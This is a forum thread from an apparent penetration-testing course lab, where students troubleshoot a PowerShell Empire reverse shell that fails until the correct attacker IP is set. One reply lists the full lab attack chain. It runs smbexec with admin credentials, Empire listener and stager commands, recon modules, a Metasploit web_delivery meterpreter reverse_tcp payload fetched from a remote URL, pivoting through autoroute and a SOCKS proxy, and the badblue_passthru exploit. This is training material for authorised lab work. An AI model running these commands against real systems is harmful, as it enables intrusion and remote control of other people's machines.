Hi, I'm having problems with the penultimate lab from PTP, PowerShell for Pentesters, Leveraging PowerShell During Exploitation.
When I tried the same command as the solutions, I don't get the reverse shell from the PowerShell command generated.
powershell-empire server
powershell-empire client
uselistener http
set Host 10.10.15.2
set Port 8888
execute
main
usestager multi/launcher
set Listener http
execute
And copied the output from these commands, but nothing happens. I decoded the PowerShell command on my machine and I don't see any IP or port that I designated before.
@felipe.scer-19966b95 Hi, even I got the same … while trying myself it was a success, but the next day the payload was not working, and even when I added the prefix as cmd.exe + payload there was no response.
If you find any solution, let us also know.
Just tried it for myself under the new web lab and it worked for me
Where you have:
set Host 10.10.15.2
Make sure you check ifconfig and set your actual IP in the answer’s place (mine was 10.10.80.2)
I also ran powershell-empire server and client with sudo
It was the IP address, just always check the Kali IP address, the eth1 interface:
smbexec.py 'Administrator:abc_123321!@#'@demo.ine.local
powershell-empire server
powershell-empire client
uselistener http
set Host 10.10.15.2
set Port 8888
execute
main
usestager multi/launcher
set Listener http
execute
agents
interact UEZTK5LX
usemodule powershell/situational_awareness/host/computerdetails
execute
usemodule powershell/situational_awareness/network/portscan
set Hosts 10.3.30.4
execute
msfconsole -q
use exploit/multi/script/web_delivery
set target 2
set SRVHOST 10.10.20.3
set LHOST 10.10.20.3
set payload windows/meterpreter/reverse_tcp
exploit
usemodule powershell/code_execution/invoke_metasploitpayload
set URL http://10.10.20.3:8080/E8tlUIOl
execute
use post/multi/manage/autoroute
set SESSION 1
run
use auxiliary/server/socks_proxy
set SRVHOST 10.10.20.3
run
use exploit/windows/http/badblue_passthru
set RHOSTS fileserver.ine.local
set PAYLOAD windows/meterpreter/bind_tcp
Kali 10.10.20.3
demo.ine.local 10.3.18.250
fileserver.ine.local 10.3.30.4